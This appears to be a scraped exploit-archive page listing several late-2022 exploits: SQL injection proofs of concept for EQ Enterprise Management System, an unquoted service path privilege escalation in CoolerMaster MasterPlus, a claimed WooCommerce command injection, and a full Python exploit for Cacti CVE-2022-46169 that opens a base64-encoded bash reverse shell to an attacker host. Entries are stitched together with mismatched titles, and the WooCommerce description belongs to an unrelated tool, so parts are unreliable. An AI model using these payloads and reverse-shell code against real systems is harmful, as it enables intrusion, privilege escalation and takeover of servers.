_pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Judging Management System 1.0 SQL Injection

EQ Enterprise Management System version 2.2.0 suffers from a remote SQL injection vulnerability.

    Exploit Title: EQ Enterprise management system v2.2.0 - SQL InjectionDate: 2022.12.7Exploit Author: TLFVendor Homepage: https://www.yiquantech.com/pc/about.htmlSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/Version: EQ v1.5.31 to v2.2.0Tested on: windows 10CVE : CVE-2022-45297 POC:POST /Account/Login HTTP/1.1 Host: 121.8.146.131 User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 118 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg Origin: http://121.8.146.131Referer: http://121.8.146.131/Account/Login X-Requested-With: XMLHttpRequest Accept-Encoding: gzipRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

EQ Enterprise Management System 2.2.0 SQL Injection

CoolerMaster MasterPlus version 1.8.5 suffers from an unquoted service path vulnerability.

    # Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path# Date: 11/17/2022# Exploit Author: Damian Semon Jr (Blue Team Alpha)# Version: 1.8.5# Vendor Homepage: https://masterplus.coolermaster.com/# Software Link: https://masterplus.coolermaster.com/# Tested on: Windows 10 64x# Step to discover the unquoted service path:wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """CoolerMaster MasterPlus Technology Service  MPService  C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe  Auto# Info on the service:C:\>sc qc MPService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: MPService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : CoolerMaster MasterPlus Technology Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem                        #Exploit:A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. Ex: (C:\Program.exe)

CoolerMaster MasterPlus 1.8.5 Unquoted Service Path

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id); 94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); 92: ⇓ function save($post_id, $post) 93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); 92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit: def __init__(self, url, proxy=None, rs_host="",rs_port=""): self.url = url self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy) self.rs_host = rs_host self.rs_port = rs_port def exploit(self): # cacti local ip from the url for the X-Forwarded-For header local_cacti_ip = self.url.split("//")[1].split("/")[0] headers = { 'X-Forwarded-For': f'{local_cacti_ip}' } revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'" import base64 b64_revshell = base64.b64encode(revshell.encode()).decode() payload = f";echo {b64_revshell} | base64 -d | bash -" payload = urllib.parse.quote(payload) urls = [] # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell) for host_id in range(1,100): for local_data_ids in range(1,100): urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}") for url in urls: r = self.session.get(url,headers=headers) print(f"{r.status_code} - {r.text}" ) pass def random_user_agent(self): ua_list = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0", ] return random.choice(ua_list)def parse_args(): import argparse argparser = argparse.ArgumentParser() argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)") argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True) argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True) return argparser.parse_args()def main() -> None: # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL args = parse_args() e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port) e.exploit()if __name__ == "__main__": main()

Tag

#windows